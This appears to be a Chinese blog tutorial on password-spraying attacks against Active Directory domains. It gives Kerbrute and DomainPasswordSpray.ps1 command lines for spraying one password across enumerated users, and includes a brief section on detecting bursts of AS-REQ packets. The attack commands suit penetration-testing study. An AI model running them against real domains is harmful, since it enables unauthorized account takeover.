渗透测试之 域AD渗透手法【密码喷洒技术】手法详解 以及相关示例

说明:

域内密码喷洒工具:

Kerbrute

DomainPasswordSpray.ps1

原理抓个包分析一下:

域内用户枚举攻击防御:

流量检测:

说明:

  • 域内密码喷洒(Password Spraying)一般和域内用户名枚举一起使用。

域内密码喷洒工具:


Kerbrute

  • 该工具的密码喷洒命令如下:
  • kerbrute_windows_amd64.exe passwordspray --dc ip -d xxx.com user.txt 321@qq.com

参数含义如下

  • passwordspray:密码喷洒模式。
  • --dc:指定域控IP。
  • -d:指定域名。

存在的用户名字典文件,也就是通过域内用户名枚举攻击枚举出的有效用户

不存在密码锁定策略

  • 该工具的密码喷洒命令如下:
  • kerbrute_windows_amd64.exe bruteuser --dc ip -d xxx.com pass.txt administrator

存在的密码字典文件,也就是通过域内用户名枚举攻击枚举出的有效用户


DomainPasswordSpray.ps1

  • Powershell 脚本工具DomainPasswordSpray.ps1也可以进行密码喷洒攻击,但是该Powershell脚本需要在域内的机器上执行,按照这个步骤使用CS工具也可以进行这个部分操作。
  • 因为默认情况下该脚本是利用LDAP从域中到处用户列表,然后去除被锁定的用户,在用指定的密码进行喷洒。
    •  Import-Module .\DomainPasswordSpray.ps1 Invoke-DomainPasswordSpray -Password 321@qq.com

原理抓个包分析一下:

  • 截图自己品品流程意思

域内用户枚举攻击防御:

  • 原理:
    • 域内用户名枚举是通过发送大量的AS-REQ包,根据返回的包内容筛选出存在的域用户,可以通过以下两方面进行检测。 
  • 流量检测:

    • 可以通过检测同一个IP在短时间内是否发送大量的AS-REQ 包来判断。如果同一个IP在短时间发送大量的AS-REQ包则可判断是异常。 如一秒30次。

以上有兴趣可以去github下载对应工具 玩玩! 加油吧骚年

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值